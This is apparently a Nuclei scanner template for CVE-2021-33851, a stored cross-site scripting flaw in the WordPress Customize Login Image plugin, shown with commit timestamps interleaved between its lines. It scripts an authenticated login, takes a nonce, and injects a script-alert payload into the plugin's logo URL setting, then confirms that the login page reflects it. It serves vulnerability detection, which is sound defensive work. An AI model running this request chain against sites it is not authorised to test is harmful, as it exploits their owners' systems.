2022-10-18 23:15:31 +00:00
id : CVE-2021-33851
info :
2022-12-09 21:40:18 +00:00
name : WordPress Customize Login Image <3.5.3 - Cross-Site Scripting
2022-10-18 23:15:31 +00:00
author : 8authur
severity : medium
description : |
2022-12-09 21:40:18 +00:00
WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
2022-10-18 23:15:31 +00:00
reference :
2022-10-21 08:41:55 +00:00
- https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
- https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
2022-10-18 23:15:31 +00:00
- https://wordpress.org/plugins/customize-login-image/
2022-10-21 08:41:55 +00:00
- https://nvd.nist.gov/vuln/detail/cve-2021-33851
2022-10-18 23:15:31 +00:00
classification :
2022-10-21 11:22:10 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
2022-10-18 23:15:31 +00:00
cve-id : CVE-2021-33851
2022-10-21 11:22:10 +00:00
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:apasionados:customize_login_image:*:*:*:*:*:*:*:*
epss-score : 0.00092
2022-10-21 08:41:55 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 4
2023-06-04 08:13:42 +00:00
verified : true
2022-10-21 11:22:10 +00:00
tags : wpscan,cve2021,wordpress,customize-login-image,wp,authenticated,cve,wp-plugin,xss
2022-10-18 23:15:31 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-10-18 23:15:31 +00:00
- raw :
- |
2022-10-21 07:20:20 +00:00
POST /wp-login.php HTTP/1.1
2022-10-18 23:15:31 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-10-21 00:19:34 +00:00
2022-10-18 23:15:31 +00:00
log={{username}}&pwd={{password}}&wp-submit=Log+In
2022-10-21 00:19:34 +00:00
2022-10-18 23:15:31 +00:00
- |
2022-10-21 07:20:20 +00:00
GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1
2022-10-18 23:15:31 +00:00
Host : {{Hostname}}
2022-10-21 00:19:34 +00:00
2022-10-18 23:15:31 +00:00
- |
2022-10-21 07:20:20 +00:00
POST /wp-admin/options.php HTTP/1.1
2022-10-18 23:15:31 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-10-21 00:19:34 +00:00
2022-10-21 08:41:55 +00:00
option_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=
2022-10-21 08:44:01 +00:00
2022-10-18 23:15:31 +00:00
- |
2022-10-21 07:20:20 +00:00
GET /wp-login.php HTTP/1.1
2022-10-18 23:15:31 +00:00
Host : {{Hostname}}
cookie-reuse : true
req-condition : true
matchers :
- type : dsl
dsl :
- 'status_code_4 == 200'
2023-06-19 21:10:30 +00:00
- 'contains(header_4, "text/html")'
2022-10-21 08:41:55 +00:00
- 'contains(body_4, "Go to <script>alert(document.domain)</script>")'
2022-10-21 00:19:34 +00:00
condition : and
2022-10-21 08:44:01 +00:00
2022-10-21 08:41:55 +00:00
extractors :
- type : regex
name : nonce
part : body
group : 1
regex :
- 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
internal : true